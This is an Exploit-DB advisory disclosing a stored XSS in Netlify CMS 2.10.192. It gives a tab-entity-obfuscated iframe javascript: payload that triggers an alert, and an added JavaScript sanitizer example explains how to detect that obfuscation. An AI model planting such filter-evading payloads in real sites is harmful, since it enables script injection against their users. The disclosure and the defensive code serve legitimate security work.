[webapps] Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
2023-7-11 08:0:0 Author: www.exploit-db.com

# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr
# Vendor Homepage: https://decapcms.org/docs/intro/
# Software Link: https://github.com/decaporg/decap-cms
# Version: 2.10.192
# Tested on: https://cms-demo.netlify.com


Description:

1. Go to New Post and enter your payload in the body field:

https://cms-demo.netlify.com/#/collections/posts

Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>

2. After saving, the XSS payload is executed and an alert box appears.
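
Added example, not part of the original advisory and not Decap CMS code: the payload above hides the `javascript:` scheme behind `&Tab;` entities, which the HTML parser decodes to tab characters and the URL parser then removes, so a check on the raw attribute string misses it. The sketch below (hypothetical function names, a deliberately small entity table) resolves the scheme the way a browser would and applies an allowlist.

```javascript
// Added example: scheme check for URL attributes such as <iframe src>.
// Only the entities relevant here; a real sanitizer should use a full HTML parser.
const NAMED = { Tab: "\t", NewLine: "\n", colon: ":", amp: "&" };

// Decode named and numeric character references as an HTML parser would
// inside an attribute value (subset, errs on the side of decoding).
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);?/gi, (m, ref) => {
    if (ref[0] !== "#") return Object.hasOwn(NAMED, ref) ? NAMED[ref] : m;
    const cp = /^#x/i.test(ref) ? parseInt(ref.slice(2), 16) : parseInt(ref.slice(1), 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// Scheme as the URL parser sees it: leading/trailing C0 controls and spaces
// are stripped, then every ASCII tab and newline is removed (WHATWG URL).
function effectiveScheme(attrValue) {
  const url = decodeEntities(attrValue)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null; // null means a relative URL
}

// Assumed allowlist for this example; adjust to what the editor must support.
const ALLOWED = new Set(["http", "https", "mailto"]);

// Weak check: looks at the raw string only.
function naiveIsSafe(v) {
  return !/^\s*javascript:/i.test(v);
}

// Hardened check: allowlist on the decoded, normalized scheme.
function isSafeUrl(v) {
  const scheme = effectiveScheme(v);
  return scheme === null || ALLOWED.has(scheme);
}

// src value taken from the payload on this page.
const PAGE_SRC = "java&Tab;sc&Tab;ript:al&Tab;ert()";

console.log("naive check passes it:", naiveIsSafe(PAGE_SRC));
console.log("effective scheme:", effectiveScheme(PAGE_SRC));
console.log("allowlist check passes it:", isSafeUrl(PAGE_SRC));
```

The same comparison belongs in a regression test for whatever sanitizer renders stored Markdown or HTML, alongside a Content-Security-Policy that blocks inline script execution.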
            

Source: https://www.exploit-db.com/exploits/51576